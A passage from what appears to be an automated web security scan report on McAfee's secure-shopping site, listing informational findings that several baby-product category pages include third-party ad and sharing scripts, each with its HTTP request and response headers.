Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:30 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:30 GMT
Content-Length: 53185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Shirts at McAfee Secure Shopping - Search, Discover & Compar
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.19. http://secureshopping.mcafee.com/browse/baby/apparel/sweaters/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/sweaters/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/apparel/sweaters/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:32 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:32 GMT
Content-Length: 54308

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Sweaters at McAfee Secure Shopping - Search, Discover & Comp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.20. http://secureshopping.mcafee.com/browse/baby/apparel/swimwear/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/swimwear/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/apparel/swimwear/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:33 GMT
Content-Length: 51324

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Swimwear at McAfee Secure Shopping - Search, Discover & Comp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.21. http://secureshopping.mcafee.com/browse/baby/bathing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bathing/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:57 GMT
Content-Length: 51403

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Bathing & Bathroom at McAfee Secure Shopping - Search, Disco
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.22. http://secureshopping.mcafee.com/browse/baby/bathing/bath-tubs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/bath-tubs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bathing/bath-tubs/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:59 GMT
Content-Length: 55742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Bath Tubs at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.23. http://secureshopping.mcafee.com/browse/baby/bathing/hooded-towels/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/hooded-towels/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bathing/hooded-towels/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:50:59 GMT
Content-Length: 63592

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Hooded Towels at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.24. http://secureshopping.mcafee.com/browse/baby/bathing/lotion/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/lotion/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bathing/lotion/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:01 GMT
Content-Length: 64873

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Lotion at McAfee Secure Shopping - Search, Discover & Compar
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.25. http://secureshopping.mcafee.com/browse/baby/bathing/potty-training/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/potty-training/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bathing/potty-training/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:02 GMT
Content-Length: 58925

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Potty Training at McAfee Secure Shopping - Search, Discover &amp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.26. http://secureshopping.mcafee.com/browse/baby/bathing/powder/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/powder/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bathing/powder/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:03 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:03 GMT
Content-Length: 59928

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Powder at McAfee Secure Shopping - Search, Discover & Compar
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.27. http://secureshopping.mcafee.com/browse/baby/bathing/shampoo/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bathing/shampoo/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bathing/shampoo/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:05 GMT
Content-Length: 68610

